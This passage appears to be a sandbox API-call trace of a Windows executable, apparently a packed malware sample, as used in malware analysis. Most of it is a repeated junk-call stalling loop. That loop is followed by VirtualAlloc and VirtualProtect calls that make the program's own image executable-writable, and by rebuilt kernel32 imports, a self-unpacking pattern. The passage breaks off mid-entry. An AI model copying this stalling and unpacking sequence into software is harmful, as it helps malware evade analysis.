lpBuffer="Module32FirstW") returned 0x26 [0129.136] AddAtomA (lpString=0x0) returned 0x0 [0129.136] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.136] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.136] AddAtomA (lpString=0x0) returned 0x0 [0129.136] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.136] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.136] AddAtomA (lpString=0x0) returned 0x0 [0129.136] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.136] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.136] AddAtomA (lpString=0x0) returned 0x0 [0129.136] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.136] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.136] AddAtomA (lpString=0x0) returned 0x0 [0129.136] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.137] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.137] AddAtomA (lpString=0x0) returned 0x0 [0129.137] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.137] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.137] AddAtomA (lpString=0x0) returned 0x0 [0129.137] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.137] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.137] AddAtomA (lpString=0x0) returned 0x0 [0129.137] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.137] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.137] AddAtomA (lpString=0x0) returned 0x0 [0129.137] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.137] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.137] AddAtomA (lpString=0x0) returned 0x0 [0129.137] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.137] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.137] AddAtomA (lpString=0x0) returned 0x0 [0129.138] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.138] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.138] AddAtomA (lpString=0x0) returned 0x0 [0129.138] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.138] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.138] AddAtomA (lpString=0x0) returned 0x0 [0129.138] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.138] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.138] AddAtomA (lpString=0x0) returned 0x0 [0129.138] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.138] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.138] AddAtomA (lpString=0x0) returned 0x0 [0129.138] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.138] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.138] AddAtomA (lpString=0x0) returned 0x0 [0129.138] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.138] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.139] AddAtomA (lpString=0x0) returned 0x0 [0129.139] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.139] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.139] AddAtomA (lpString=0x0) returned 0x0 [0129.139] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.139] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.139] AddAtomA (lpString=0x0) returned 0x0 [0129.139] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.139] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.139] AddAtomA (lpString=0x0) returned 0x0 [0129.139] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.139] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.139] AddAtomA (lpString=0x0) returned 0x0 [0129.139] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.139] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.139] AddAtomA (lpString=0x0) returned 0x0 [0129.139] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.140] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.140] AddAtomA (lpString=0x0) returned 0x0 [0129.140] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.140] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.140] AddAtomA (lpString=0x0) returned 0x0 [0129.140] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.140] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.140] AddAtomA (lpString=0x0) returned 0x0 [0129.140] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.140] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.140] AddAtomA (lpString=0x0) returned 0x0 [0129.140] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.140] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.140] AddAtomA (lpString=0x0) returned 0x0 [0129.140] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.140] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.140] AddAtomA (lpString=0x0) returned 0x0 [0129.141] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.141] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.141] AddAtomA (lpString=0x0) returned 0x0 [0129.141] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.141] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.141] AddAtomA (lpString=0x0) returned 0x0 [0129.141] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.141] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.141] AddAtomA (lpString=0x0) returned 0x0 [0129.141] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.141] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.141] AddAtomA (lpString=0x0) returned 0x0 [0129.141] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.141] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.141] AddAtomA (lpString=0x0) returned 0x0 [0129.141] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.141] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.142] AddAtomA (lpString=0x0) returned 0x0 [0129.142] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.142] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.142] AddAtomA (lpString=0x0) returned 0x0 [0129.142] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.142] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.142] AddAtomA (lpString=0x0) returned 0x0 [0129.142] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.142] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.142] AddAtomA (lpString=0x0) returned 0x0 [0129.142] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.142] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.142] AddAtomA (lpString=0x0) returned 0x0 [0129.142] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.142] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.142] AddAtomA (lpString=0x0) returned 0x0 [0129.142] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.143] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.143] AddAtomA (lpString=0x0) returned 0x0 [0129.143] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.143] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.143] AddAtomA (lpString=0x0) returned 0x0 [0129.143] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.143] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.143] AddAtomA (lpString=0x0) returned 0x0 [0129.143] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.143] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.143] AddAtomA (lpString=0x0) returned 0x0 [0129.143] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.143] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.143] AddAtomA (lpString=0x0) returned 0x0 [0129.143] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.143] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.143] AddAtomA (lpString=0x0) returned 0x0 [0129.143] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.143] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.143] AddAtomA (lpString=0x0) returned 0x0 [0129.143] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.143] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.143] AddAtomA (lpString=0x0) returned 0x0 [0129.143] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.144] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.144] AddAtomA (lpString=0x0) returned 0x0 [0129.144] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.144] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.144] AddAtomA (lpString=0x0) returned 0x0 [0129.144] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.144] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.144] AddAtomA (lpString=0x0) returned 0x0 [0129.144] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.144] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.144] AddAtomA (lpString=0x0) returned 0x0 [0129.144] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.144] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.144] AddAtomA (lpString=0x0) returned 0x0 [0129.144] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.144] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.144] AddAtomA (lpString=0x0) returned 0x0 [0129.144] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.144] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.144] AddAtomA (lpString=0x0) returned 0x0 [0129.144] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.144] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.144] AddAtomA (lpString=0x0) returned 0x0 [0129.144] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.145] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.145] AddAtomA (lpString=0x0) returned 0x0 [0129.145] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.145] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.145] AddAtomA (lpString=0x0) returned 0x0 [0129.145] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.145] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.145] AddAtomA (lpString=0x0) returned 0x0 [0129.147] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.147] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.147] AddAtomA (lpString=0x0) returned 0x0 [0129.147] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.147] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.147] AddAtomA (lpString=0x0) returned 0x0 [0129.147] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.147] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.147] AddAtomA (lpString=0x0) returned 0x0 [0129.147] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.147] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.147] AddAtomA (lpString=0x0) returned 0x0 [0129.147] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.147] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.147] AddAtomA (lpString=0x0) returned 0x0 [0129.147] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.147] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.147] AddAtomA (lpString=0x0) returned 0x0 [0129.147] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.147] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.148] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.148] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.148] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.148] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.148] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.148] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.148] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.148] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.148] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.148] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.148] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.148] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.148] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.148] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.148] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.148] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.148] AddAtomA (lpString=0x0) returned 0x0 [0129.149] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.149] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.149] AddAtomA (lpString=0x0) returned 0x0 [0129.149] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.149] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.149] AddAtomA (lpString=0x0) returned 0x0 [0129.149] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.149] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.149] AddAtomA (lpString=0x0) returned 0x0 [0129.149] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.149] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.149] AddAtomA (lpString=0x0) returned 0x0 [0129.149] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.149] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.149] AddAtomA (lpString=0x0) returned 0x0 [0129.149] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.149] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.149] AddAtomA (lpString=0x0) returned 0x0 [0129.149] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.149] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.149] AddAtomA (lpString=0x0) returned 0x0 [0129.149] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.149] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.150] AddAtomA (lpString=0x0) returned 0x0 [0129.150] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.150] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.150] AddAtomA (lpString=0x0) returned 0x0 [0129.150] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.150] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.150] AddAtomA (lpString=0x0) returned 0x0 [0129.150] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.150] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.150] AddAtomA (lpString=0x0) returned 0x0 [0129.150] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.150] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.150] AddAtomA (lpString=0x0) returned 0x0 [0129.150] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.150] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.150] AddAtomA (lpString=0x0) returned 0x0 [0129.150] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.150] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.150] AddAtomA (lpString=0x0) returned 0x0 [0129.150] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.150] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.194] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0129.195] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0129.195] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0129.195] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0129.195] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0129.195] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0129.195] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0129.195] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0129.195] SetErrorMode (uMode=0x400) returned 0x0 [0129.195] SetErrorMode (uMode=0x0) returned 0x400 [0129.195] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0129.195] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x1a0000 [0129.199] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0129.263] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.265] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0129.265] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0129.265] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0129.266] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0129.267] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0129.268] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0129.269] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0129.270] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0129.270] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0129.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0129.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0129.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0129.290] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 